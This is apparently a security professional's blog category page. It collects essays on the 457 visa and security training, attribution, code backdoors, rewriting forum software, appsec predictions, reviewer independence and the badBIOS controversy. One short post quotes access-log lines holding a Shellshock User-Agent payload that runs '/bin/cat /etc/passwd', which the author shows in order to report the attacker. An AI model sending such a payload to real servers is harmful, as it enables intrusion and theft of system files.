Category: Security

  • Training the next generation or abolition of the Australian 457 visa

    Without consultation or warning, the Australian Government has decided to abolish the speciality skilled migration 457 visa system.

    There is currently a great deal of confusion, but it seems that the current plan is that there are two lists of skills shortages eligible for varying lengths of temporary stay and migration outcome:

    • The Short Term Combined Skills Shortage list lists IT security professionals (ANZSCO  code 262112). Folks sponsored on this visa are eligible for a two year visa and then they need to return home. This visa category does not lead either to permanent residency or eventual citizenship.
    • The Medium and Long-term Strategic Skills List, which allows 457 visas to be granted for four years. As this category stands today (20th April 2017), this list has no IT security professional category, despite our industry lacking tens of thousands of workers. Migrants employed under this skills list can lead to permanent residency and eventual citizenship.

    As a profession, we have been overlooked. Abandoned, even. IMHO, with this change, Australia is being cut off from the world without adequate notice. We haven’t planned for this, and so it’s going to be chaotic and an extremely tight market for a while as we transition to not being able to hire immigrant workers.

    Where to start? Well, in the olden days, folks with an interest in security sort of fell into it. Back then, it was the wild west. It could easily end up that way again. I think we can do better, but we need to address the skills pipeline, starting with Universities popping out rounded students who have a holistic and deep understanding of many areas of IT Security, and not just one small element of it.

    It’s difficult to hire juniors today. They exist, but the problem is that clients often expect the “A” team, and will ring you up after a gig if they are unhappy for whatever reason with a consultant and ask that they don’t return. After a few of those calls, and we’re in deep scheduling do-do. We do take the opportunity to learn from these calls, but it can be risky to hire someone who might have talent but needs more experience. Soon, we will have no choice, and clients will have no choice but to accept juniors and fee rises as we increase the use of shadowing.

    In the past, it was difficult with the ever downward pressure on fees to allow shadowing, which is the usual way of imparting knowledge on the job. It’s inappropriate to send in folks who can take out a client’s network or application without realising it. The Dunning Kruger effect in IT security is particularly harsh, and it can end your career if you’re not protected. It’s a difficult lesson to learn, and the best people learn the most in the hardest possible way. The only way to minimise this risk is adequate early training and shadowing for at least 6-12 months. And even then, there will still be mistakes.

    The lack of juniors is a curse on our industry today – we let it get like this, firstly by allowing clients to choose consultants rather than the team, and secondly, by not taking chances on juniors and understanding that for a couple of years, they will need to be shadowing someone before it’s safe to let them take on a job by themselves.

    We created this skills shortage by not demanding that our universities produce graduates with adequate rounded individuals that we then could layer on top industry needs, like sound consulting behaviors, people soft skills, and writing skills.

    Australian universities do not have many degrees in IT security, and those who do offer units here and there, or if they offer a major stream (and a few do, like UNSW), they concentrate on what I affectionately call “ethical hacking” rather than the full suite of our profession. I applaud the fact that at long last, we are seeing some IT security majors, but the subject matter leaves a great deal to be desired. Universities aren’t vocational schools, and yet many are pumping out vocationally trained individuals. As an industry, we need both rounded and vocationally trained graduates, with life long learning beaten into them with a healthy start on the ol’ Dunning-Kruger curve.

    Folks from these degrees often need a lot of training to get them client ready, so again, I think we need to work with higher education to produce fewer hackers and more security professionals, with a depth of skills across the IT security spectrum that will stand the test of their entire career, rather than for example folks with good CTF skills or the ability to deep dive into X86 reverse engineering.

    We need to engage with the University sector to get new degrees going in 2018, and for them to aggressively recruiting new students as a matter of priority:

    • Governance, risk and compliance
    • Identity and access management
    • Privacy and data protection
    • Enterprise and Cloud Security Architecture
    • SSDL and Secure coding
    • Application and mobile security
    • Systems and DevOps Security
    • Defences against the dark arts (Blue team)
    • Red teaming (ethical hacking)
    • DFIR, and malware analysis
    • Managing security – BAU IT Security Management and CISO
    • Critical Infrastructure Security (OT security, SCADA security, etc)

    We will have to concentrate on the more esoteric and necessary fields later, such as IoT security and embedded systems.

     

    We have less than two years to graduate students through a three year undergraduate program that does not exist today, employ them as juniors, and train them in what we do.

    I’ve said many times I can take a developer and turn them into a security pro in relatively short order (3-12 months max), but I cannot teach three years of programming to a security pro.

    For a while, I fully expect the current 0% unemployment rate in our field to become negative unemployment, with out of control wages growth as fewer folks will be around to fulfil an ever increasing number of FTE requirements. We might need to work together between security consultancies to share staff or similar, I’m sure there will be consolidation of consultancies and friendly alliances. I also bet there will be opportunistic recruiters setting up consultant farms to help folks get the best price in a really tight market. Good for them, market forces working for everyone.

    As a global Board member of OWASP (speaking in a personal capacity), I can help bring together experts in application security and drive those syllabuses in SSDL, secure coding, application and mobile security, which is a critical skill for nearly all firms that produce software and security boutiques alike.

    I call on the Universities, ACSC, AISA, OWASP, and lastly ACS to lead this charge and to engage with higher education to start the process. We must work together as an industry and higher education to build out these many syllabuses, and get the word out to prospective Uni students that IT security is a great field with immense prospects.

    The imminent abolition of IT security immigrant visas is both terrifying and exciting, because finally, we don’t have any choice – the entire lifecycle of our industry has to grow up and REALLY fast.

  • The intelligence kimono

    Some of my IR and forensics friends who I highly respect are getting all bent out shape about attribution, or the perceived lack of solid evidence for attribution regarding the DNC attacks. In particular, many of them are now publicly doubting on social media (and mainstream media) that Russia is behind the DNC hacks.

    When the Guccifer 2.0 posts came out, these same set of folks analyzed the dump, pretty much everyone in Twitter IR land was convinced the dump was by Russian intelligence services, and Guccifer 2.0 persona a Russian intel persona. Go back, check for yourself, it’s easy to do if you know the usual suspects.

    IR and forensics is not my field, so I didn’t really comment at the time, nor really now, except to repeat “attribution is hard, why bother” (particularly relating to attributing to China, which was the previous most common attribution target).

    Why bother with attribution?

    Because it gets press. Attribution is simply not that useful for the average organisation trying to protect their data … unless they need to take it to court, or you’re a nation state and you want to know who attacked you. Then it becomes vital that it is done properly, and only a few can do this well.

    Realistically, my field is protecting information. I find it frustrating when the cyclical fads in our industry lean towards the fatalistic “you’re already hacked, so let’s only detect and respond”, which has been going for nearly three years already, and two years longer than I expected. It must be making money for someone or it seems like security is finally doing a good job, when in fact, we’re only fighting fires, not constructing fire proof artefacts out of flame retardant materials.

    If we don’t start work on protecting information BY DEFAULT, we will always be fighting fires, and the world will be on constant fire. That’s crap. We can and should do better than that.

    I specialize in helping clients and anyone who consumes my standards work to protect themselves. Building security in costs far less to do the right thing, and this should be the default choice as it’s the most economic investment.

    When I help clients protect information, I like to learn how folks in their industrial sector are attacked, so I am very interested in tools, techniques and practices, and to some extent “why” they did it, but I simply don’t need to know who did it. It’s just not relevant.

    So I don’t invest in attribution because it is so ridiculously hard to get to a level that would stand up to scrutiny in court. I have colleagues who can do that, but the time and effort taken … well, if your attacker turns out to be a nation state, what are you realistically going to do about it? The same things I am already suggesting you do.

    We’re not behind the intelligence kimono

    The problem is simple: security agencies with more access than mere mortals don’t share what’s behind the intelligence kimono. Folks outside the kimono either have to trust intelligence agencies on face value, or … you have to state “I don’t personally know, but my opinion is that the evidence is not strong”.

    As one of the latest releases says:

    It’s perfectly fine and indeed I would expect that my experienced IR and forensic friends to call for a better job of presenting evidence to provide a justification for a particular conclusion without compromising state secrets.

    But to state strongly without any more evidence than has been released, such as “It’s country X or Head of State Y” or “There’s no direct evidence, so it’s not Country X or Head of State Y” is at the very least over egging it, and almost certainly wrong. But due to the intelligence kimono, we can’t say for sure.

    Intelligence agencies from my understanding rarely state things in black and white terms, but present arguments based around analysis of available (classified) information. Therefore, for the person in the street looking for an easy “It was Country X or Head of State Y”, well, that’s unlikely to ever exist.

    What can we take away from this?

    Please go easy when making public statements, particularly when we muddy the waters. Understand that there are unknown unknowns, and unless you’re on the inside of the intelligence kimono, those unknown unknowns means we can’t advocate strongly one way or another. 

    I do hope that intelligence agencies trying to brief the public on classified matters realize that the IT security field contains many awesome subject matter experts, whom will peer review your work for free, either for you, or in the media.

    Releasing under-cooked or simply wrong reports is counterproductive. It would be worthwhile to bring in those with a strong IR capability to help create public documents that stand the scrutiny of my dedicated and talented peers.

    To my dedicated and talented IR and forensic industry peers, please don’t be “It’s not X” in the media and all over social media. Unless you are inside the intelligence kimono, you have no more information than I do unless someone is blabbing inappropriately. Please work to help government agencies do a better job instead of saying something you can’t prove any more than I can, even with your additional expertise.

    In the meantime, let’s not start down the path of distrusting expertise. That way lies failure.

     

  • On backdoors and malicious code

    So since the ASVS 3.0 retired much of the malicious code requirements, and after actually doing a line by line search of ~20 kLOC of dense J2EE authentication code, I’ve been thinking about various methods that backdoors might be created and not be findable by both automated and line by line searches.

    This obviously has an issue with the recent Juniper revelation that they found a backdoor in the VPN code of their SOHO device firmware. It also feels like the sort of thing that Apple suffered with GOTO FAIL, and Linux suffered a long time ago with the wait4 backdoor.

    https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

    So basically, I’ve been thinking that there obviously has to be a group dedicated to obfuscated backdooring. Making code that passes the visual and automated muster of specialists like me. There is probably another group or portion of the same group that sets about gaining sufficient privileges to make these changes without being noticed.

    So before anyone goes badBIOS on me, I think it would be useful if we started to learn what malicious coding looks like in every language likely to be backdoored.

    We can help prevent these attacks by improving the agile SDLC process, and keeping closer tabs on our repos. We can also make it more difficult to slip these things in if folks stuck to an agreed formatting style that made slipping in these types of attacks much harder, primarily by using automated indentation and linting that detected the lack of block control and assignment during conditionals. Yes, this will make some code visually longer, but we cannot tolerate more backdoors.

    I’ve been doing a LOT of agile SDLC security work in the last few years, working WITH the developers on creating actually secure development processes and resilient applications, rather than reviewing the finished product and declaring their babies ugly. The latter does not work. You cannot review your way to building secure applications. We need to work with developers.

    This is important as we’re starting to see an explosion in language use. It’s not merely enough to understand how these things are done in C or C++, but any system language, and any up and coming languages, many of whom we have zilch, nada, nothing in the way of automated tools, code quality tools, and specialists familiar with Go, Clojure, Haskell, and any number of other languages I see pop up from time to time.

    What I think doesn’t work is line by line reviewing. All of these pieces of code must be have been looked at by many people (the many eyeballs fallacy) and run past a bunch of automated source code analysis tools, and it was “all good”, but it wasn’t really. Who knows how many secure code review specialists like me looked at the code? We need better knowledge and better techniques that development shops can implement. I bet we haven’t seen the last of Juniper style attacks pop up. Most firms are yet to really look through their unloved bastard repos full of code from developers past, present and future.

  • Time to start rebuilding GaiaBB

    In a life a long time ago in early 2002, we had to move Australia’s largest Volkswagen car forum from EzyBoard, which was distributing malicious ads and hard to get rid of pop ups to our users, to our own forum software. After a product selection, I chose XMB, which was (and is) better than all the other free forums out there, such as phpBB (didn’t have attachments until v3/0!), and others.

    XMB was a good choice as it had so many features. What I didn’t know is that XMB was full of security holes. XMB started life as a two week effort by a then 14 year old, who had limited capabilities in writing secure software. If you looked at the OWASP Top 10 and XMB, XMB had at least one of everything. We had XSS, we had SQL injection, we had access control problems, we had authentication bypass, we had … you name it, we had it. Boards were being pwned all over. So I started to help XMB, and soon became their security manager.

    The story of XMB’s rise and fall is long and complicated, with many machinations over its history. There were multiple changes of lead developer, of which I caused at least once, something I’m not proud of, nor realistically never covered anyone in glory. The original 14 year old was pushed out before I got there, and there were various stories floating around, but one of the interesting things is that as a result of that, a company thought they owned a free software project. I pushed to have our software adopt the GPL, which was accepted at the time, and it’s the only reason that XMB and all its forks including GaiaBB lasted to this day.

    XMB was forked relentlessly, being the basis of MyBB and OpenBB, as well as UltimaBB and then GaiaBB. The late 2000’s were not friendly to XMB, with the loss of not only the main development system, but also a change of “ownership” caused much rifts. Then there was another failed fork called UltimateXMB, which initially was a mod central for XMB, but then turned into a fully customized version of XMB like UltimaBB, but closer in database schema to XMB itself. The last fork of XMB, XMB 2, was a last ditch effort to stop it dying, but it failed as well as the last “owner” of XMB decided to use DCMA take down requests, which is illegal as I owned the (C) of many of the files in XMB, as did others – particularly John Briggs and Tularis. That last remnant of the one true tree of XMB can be found XMB Forum 2.

    In 2007, I forked XMB with John Briggs, creating UltimaBB, which life was good for a while, we had momentum and it worked better than XMB during those years. After the loss of the XMB master SVN tree, XMB 1.9.5 was resurrected as an effectively a reverted version of UltimaBB. Then life changed for me, with moving the US and having a child, so we parted ways, which was sad at the time for me as I knew what would happen without a strong and active lead developer. Eventually UltimaBB withered too. I had to fork UltimaBB, creating GaiaBB as I needed to keep my car forum Aussieveedubbers alive and secure.

    GaiaBB got only just enough love to keep it secure, but it hasn’t kept up. It barely functions on PHP 5.6 and modern browsers render it funny. The technical debt from the basis of 14 year old “modular” code originally written by a 14 year old (header.php and functions.php are both monolithic and stupidly long), it’s time to call time on it.

    So I need to start over or find something new for my forum. As I need to keep my skills up with the modern kids writing software today, I’ve decided to make the investment in re-writing the software so I can learn about modern Ajax frameworks, and have a go at writing back end code. No small part of this is that I want to learn about the security measures as a developer as a code reviewer and penetration tester, you can’t talk to developers unless you know how applications are built and tested, and all the compromises that go into making applications actually run.

    GaiaBB

    So let’s talk about GaiaBB. Compared to most PHP forum software, it’s pretty secure. It’s got all the features you would ever need and then a lot more on top of that. But it’s spaghetti nightmare. It needs a total re-write. It’s not responsive design in any shape or form. Mobile users just can’t use it. There are heaps of bugs that need fixing. There’s no test suite. Database compatibility is not its strong point.

    Frontend decision – Polymer

    After looking around, I’ve decided that the front end shall be Polymer as it has good anti-XSS controls and is rapidly evolving. It does responsive design like no one’s business. And because Polymer hasn’t got the cruft of some of the alternatives it will make me think harder about the UI design of the forum software.

    Back in the day, we crammed as many pixels and features into a small space because that was the thing then. Nowadays, it’s more about paring back to the essentials. This is critical for me as I don’t have the time to put back EVERY feature of GaiaBB, but as I know most features are never used, that’s not a big deal.

    Backend considerations

    Now, I need to choose a back end language to do the re-write. My requirements are:

    • Must be workable on as many VPS providers as possible as many do not provide a way to run non-PHP applications without difficulty
    • Must be fast to develop, so I am not interested in enterprise style languages which requires hundreds of lines of cruft where one line is actually required
    • Must support RESTful API
    • Must support OAuth authentication as although I can write an identity provider, I am more than willing to allow forum owners integrate our identity with Facebook Connect or Google+.
    • Must be a entity framework for data access. The days of writing SQL queries are done. I want database transparency.
    • Must support writing automated unit and integration tests. This is not optional

    So far, I’ve looked at various languages and frameworks, including:

    • PHP. OMG the pain. There are literally no good choices here. You’d think because I have a lot of the business logic already in PHP that this would be a no-brainer, but the reality is that I have terrible code that is untestable.
    • Go. Very interesting choice as it’s a system language that explicitly supports threading and all sorts of use cases. However, it does not necessarily follow that writing backend code in Go is the way to go as I’ve not found a lot of examples that implement restful web services. It’s possible as it’s a system language, but I don’t want to be the bunny doing the hard yards.
    • Groovy and Grails. I have clients who use this, so I am interested from learning the ins and outs as it seems pretty self documenting and fast to write. Uses a JVM
    • Spring. Many clients use this, but I do not like how much glue code Java makes you write to do basic things. Patterns implemented in Spring seem to take forever to provide a level of abstraction that is not required in real life. I want something simpler.

    Frameworks I will not consider.

    The few remaining XMB, UltimaBB, and GaiaBB forums need to be migrated to something modern, and that requires support. I don’t have time for support, so I am going to exclude a few things now.

    • Python / Django. I don’t write Python. Few clients use it and I don’t want to be figuring out or supporting a Python web service layer.
    • Node.js. I know this was hot a few years ago, but seriously, I need security, and writing a backend in something that does not protect against multi-threaded race conditions is not okay.
    • Ruby on Rails. I was thinking about this for a bit, but honestly, I’ve never had to review a Ruby on Rails application, so re-writing my business logic and entities in this will not give me more insight than using Groovy/Grails, which I do have clients.

    At the moment, I’m undecided. I might use Groovy/Grails as it’s literally the simplest choice so far, and supports exactly what I want to do.  That said, Groovy/Grails is starting to lose corporate backing, so I don’t want to use a language that might end up on the scrapheap of history.

    What would you do? I’m interested in your point of view if you’ve done something interesting as a RESTful API.

  • Looking back at 2009 and Predictions for 2015

    I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that besides the dramatic increase in mobile assessments this last year or two, the things I was banging on about in 2009 are still issues today:

    Developer education is woeful. I recently did an education piece for a developer crowd at a client, and only two of 30 knew what XSS was, and only one of them was aware of OWASP. At least at a University event I did later on in the year, about 20% of the students were aware of OWASP, XSS, SQL injection and security. The other 80% – not so much. I hope I reached them!

    Agile security is woeful. When it first came out, I was enthralled by the chance for a SDLC to be secure by default because they wrote tests. Unfortunately, many modern day practitioners felt that all non-functional requirements were in the category of “you ain’t gonna need it“, and so the state of agile SDLC security is just abysmal. There are some shops that get it, but this year, I made the acquaintance of an organisation that prides themselves on being agile thought leaders who told our mutual client they don’t need any of that yucky documentation, up front architecture or design, or indeed any security stuff, such as constraints or filling in the back of the card with non-functional requirements.

    Security conferences are still woeful. Not only is there a distinct lack of diversity in many conferences (zero women speakers at Ruxcon for example), very few have “how do we fix this?” talks. Take for example, the recent CCC event in Berlin. The media latched onto talks about biometric security failing (well, duh!) and SS7 insecurity (well, duh! if you’ve EVER done any telco stuff). Where are the talks about sending biometrics to the bottom of the sea with concrete shackles or replacing SS7 with something that the ITU hasn’t interfered with?

    Penetration testing still needs to improve. I accept some of the blame here, because I was unable to change the market. They still sell really well. We really need to move on from pen tests as a wasted opportunity cost for actual security. We should be selling hybrid application verifications – code reviews with integrated pen tests to sort the exploitability of vulnerabilities properly. Additionally, the race to the bottom of the barrel with folks selling 1-2 day automated tests as equivalent to a full security verification for as little money as they can. We need a way of identifying weak tests from strong tests so the market can weed out useless checkbox testing. I don’t think red teaming is the answer as it’s a complete rod length check that can cause considerable harm unless performed with specific rules of engagement, that most red team folks would think invalidates a red team exercise.

    Secure supply chain is still an incomplete problem. No progress at all since 2009. Until liability is reversed from the unique position that software – unlike all other goods and services is somehow special and needs special protection (which might have been true back in the 70’s during the home brew days), it’s not true today. We are outsourcing and out-tasking more and more every day, and unless the suppliers are required to uphold standard fit for purpose rules that all other manufacturers and suppliers have to do, we are going to get more and more breaches and end of company events. Just remember, you can outsource all you like,  but you can’t out source responsibility. If managers are told “it’s insecure” and take no or futile steps to remediate it, I’m sorry, but these managers are accountable and liable.

    At least, due to the rapid adoption of JavaScript frameworks, we are starting to see a decline in traditional XSS. If you don’t know how to attack responsive JSON or XML API based apps and DOM injections, you are missing out on new style XSS. Any time someone tells you that security is hard to adopt because it requires so much refactoring, point them at any responsive app that started out life a long time ago. There’s way more refactoring in changing to responsive design and RESTful API than adding in security.

    Again, due to the adoption of frameworks, such as Spring MVC and so on, we are starting to see a slight decline in the number of apps with CSRF and SQL injection issues. SQL injection used to be about 20-35% of all apps I reviewed in the late 2000’s, and now it’s fairly rare. That said, I’ve had some good times in 2014 with SQL injection.

    The only predictions I will make for 2015 is a continued move to responsive design, using JavaScript frameworks for web apps, a concerted movement towards mobile first apps, again with a REST backend, and an even greater shift towards cloud, where there is no perimeter firewall. Given the lack of security architecture and coding knowledge out there, we really must work with the frameworks, particularly those on the backend like node.js and others, to protect front end web devs from themselves. Otherwise, 2015 will continue to look much like 2009.

    So the best predictions are those you work on to fix. To that end, I was recently elected by the OWASP membership to the Global Board as an At Large member. And if nothing else – I am large!

    • I will work to rebalance our funding from delivering most of OWASP’s funds directly back to the members who are paying us a membership fee who then don’t spend the allocated chapter funds, but instead, become focussed on building OWASP’s relevance and future by spending around 30% building our projects, standards, and training, 30% on outreach, 30%  on membership, and 10% or less for admin overheads.
    • I will work towards ensuring that we talk to industry standards bodies and deal OWASP into the conversation. We can’t really complain about ISO, NIST, or ITU standards if they don’t have security SMEs to help draft these standards, can we?
    • I will work towards redressing the diversity both in terms of gender and region in our conferences, as well as working towards creating a speaker list so that developer conferences can look through to provide invited talks to great local appsec experts. We have so many great speakers with so much to say, but we have to get outside the echo chamber!
    • We have to increase our outreach to universities. We’ve lost the opportunity to train the folks who will become the lead devs and architects in the next 5-10 years, but we can work with the folks coming behind them. Hopefully, we can invest time and effort into addressing outreach to those folks already in the industry in senior/lead developer and architect and business analyst roles, but in terms of immediate bang for buck, we really need to address university level education to the few “ethical hacking” courses (which is a trade qualification), and work on building in security knowledge to the software engineers and comp sci students of the future. Ethical hacking courses have a place … for security experts, but for coders, they are a complete waste of time. Unless you are doing offensive security as your day job, software devs do not need to know how to discover vulnerabilities and code exploits, except in the most general of ways.

    It’s an exciting time, and I hope to keep you informed of any wins in this area.

  • Independence versus conflict of interest in security reviews

    I was giving a lecture to some soon to be graduating folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”.

    No, it’s not. And here’s why.

    Conflict of interest

    It’s only conflict of interest if a developer who wrote the code then reviews the code and declares it free of bugs (or indeed, is honest and declares it full of bugs). In either case, it’s self review, which is a conflict of interest.

    The only way the auditor is in a conflict of interest is if the auditor reviews code they wrote. This is self-review.

    An interesting corner case that requires further thought is a rare case indeed: I wrote or participated in a bunch of OWASP standards, some of which became bits of other standards and certifications, such as PCI DSS section 6.5. Am I self-reviewing if I reviewing code or applications against these standards?

    I think not, because I am not changing the standard to suit the review (which is an independence issue),  and I’m not reviewing the standard (which would be self-review, which is a conflict of interest).

    Despite this, for independance reasons where I think an independence in appearance issue might arise, I always put in that I created or had a hand in these various standards. Especially, if I recommend a client to use a standard that I had a hand in.

    Independence

    Independence is not just an empty word, it’s a promise to our clients that we are not tied to any particular vendor or methodology. We can’t be a trusted advisor if we’re a shill for a third party or are willing to compromise the integrity of review at a customer’s request.

    The usual definition of independence is two pronged:

    • Independence in appearance.  If someone thinks that you might be compromised because of affiliations or financial interest, such as if you’ve previously held a job. For example, if you’ve always worked in incident response tool vendors, and then move to a security consultancy, you might feel you are independent, but others might perceive you as having a pro-IR toolset point of view.
    • Independance in actuality. If you own shares or get a financial reward for selling a product, any recommendation you make about recommending that product is suspect. This is the reason I want OWASP to remain vendor neutral.

    If either of these prongs are violated, you are not independent. But just as humans are complex, there are many aspects to independence, and I’ve not learnt them all. I know most of the issues, been there got the t-shirt.

    If you are independent, there are a few areas of independence that I refuse to relinquish (and I hope you do too!):

    • Scoping questions. I don’t mind customers setting a scope, but I will often argue for the correct scope before we start. Too narrow a scope can railroad a review into giving an answer the client wants, rather than a proper independent review.
    • Review performance independence. If the client tries to make the review so short that I can’t complete my normal review program in an effective manner or they stop me from getting the information I need, or tries to frame negative observations in a lesser or “meh” context, I will resist. I want to ensure that the review is accurate, but not at the expense of performing my methodology or being up to my usual standards.
    • Risk ratings and findings. In the last few years, I’ve had to resist folks trying to force real findings to become unrated opportunities for improvement (by definition all of my findings are such), or trying to reduce risk ratings by arguing with me, or getting words changed to suit a desired outcome. Again, I want the context to be accurate and I will listen to your input / arguments, but only I will write the report and set risk ratings. Otherwise, why bother hiring an external reviewer? You could write your own report set the ratings to suit. It doesn’t work that way.

    Does independence always need to be achieved?

    My personal view on this has changed over the years. I used to toe the strict party line on independence.

    However, sometimes as a reviewer, you can be part of the solution. I personally believe that a good working relationship between the reviewer and the folks who produced the application or code is a good thing. Both parties can learn from working closely together, work out the best approach to resolving issues, and test it rapidly.

    As long as the self-review aspect is properly managed, I believe this to be a good path forward. I don’t see this as being any different as a traditional review that recommends fix X, and then reviewing that X has been put into place. However, if the auditor is editing code, that has crossed the line.

    Work with the business to document agreed rules of engagement early prior to work commencing. Both parties will get a lot more mileage from a closely cooperative review than a “pay someone to sit in the corner for two weeks” that is the standard fare of our industry.

    Conclusion

    Working together has obvious independance issues, particularly from an appearance point of view. So to the excellent question from a student today, working tightly with the auditors is not a conflict of interest, but it can be an independence issue if not properly managed by both the business and the reviewer.

  • Some people don’t get the hint

    85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1” 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd”
    85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1” 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd”

    Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.

  • So it’s finally happened

    Passwords. Pah.

    After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords.

    Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational security. There will be consequences. That is not a threat.

  • AppSec EU – DevGuide all day working party! Be a part of it!

    Be a part of the upcoming AppSec EU in Cambridge!

    Developer Guide Hackathon
    Developer Guide Hackathon

     

    * UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. *

    Eoin Keary and myself will be running an all day working party on the Developer Guide On June 24 from 9 AM to 6 PM GMT. The day starts with Eoin giving a DevGuide status update talk, and then we get down with editing and writing. 

    I will be working remotely from the end of Eoin’s talk to til 1 pm UK time, and I so I encourage everyone who has an interest in the Devguide to either attend the workshop in person, or consider helping out remotely. Sign up here!

    https://www.owasp.org/index.php/Projects_Summit_2014/Working_Sessions/004

    My goal is to get the entire text of the OWASP Developer Guide 2.0 ported to the new format at GitHub, and hopefully finish 4 chapters. To participate, you will need a browser and a login to GitHub. You will also probably want a login to Google+ so you can be a part of an “on air” all day hangout so you can ask me anything about the DevGuide, or just chill with other remote participants.

  • Stop. Just stop.

    In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real” “It’s impossible” “It’s fake” is becoming overwhelming without sufficient evidence one way or another. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or another?

    My issue is not “is it true” or “I think it’s true” or “I think it’s false”, it’s that so many info sec “professionals” are basically claiming:

    1. Because I personally can’t verify this issue is true, the issue must be false. QED.

    This fails both Logic 101, class 1, and also the scientific method. 

    This is not a technical issue, it’s a people issue.

    We must support all of our researchers, particularly the wrong ones. This is entirely obvious. If we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly “I think X is a fool for thinking that his computers are suspect”. This is utterly wrong, foolhardy, and works for the click bait articles the J’s write and on their news cycle, not for us.

    Not everybody is a viable candidate for having the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security and budget to brick and then utterly destroy at least two or twenty computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to needing the electronic equivalent of Level PC4 bio labs. Most labs are not PC4, and I bet most of infosec computing labs are not anywhere near capable of hosting this sample.

    Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together, pulling together E.Eng folks with the sort of expensive equipment only a well funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

    We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias, we must rule out just “well, a $0.10 audio chip will do that as most of them are paired with $0.05 speakers and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and it’s lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

    We must allow sufficient time to allow the researchers to collaborate and either have a positive or negative result, analyse their findings and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24 hour news cycle is their problem, not our problem. We have Twitter or Google Plus or conferences. Have some respect and wait a little before running to the nearest J “friends” and bleating “It’s an obvious fake”.

    We owe a debt to folks like Dragos who have odd results, and who are brave enough to report them publicly. Odd results are what pushes us forward as an industry. Cryptoanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen the next time? What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

    Our industry’s story is not the story about the little boy who cried wolf. We are (or should be) more mature than a child’s nursery rhyme. Have some respect for our profession, and work with researchers, not sully their name (and yours and mine) by announcing before you have proof that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened. I try every trick in the book, including the stuff that is bleeding edge as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, it’s either sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet that few of us could have gotten as far as Dragos has.

    To me, we must step back, work together as an industry – ask Dragos: “What do you need?” “How can we help?” and if that’s “Give me time”, then let’s step back and give him time. If it’s a USB circuit analyser or a microcontroller dev system and plus some mad soldering skills, well, help him, not tear him down. Dragos has shown he has sufficient operational security to research another 12-24 months on this one. We don’t need to know now, now, or now. We gain nothing by trashing his name.

    Just stop. Stop trashing our industry, and let’s work together.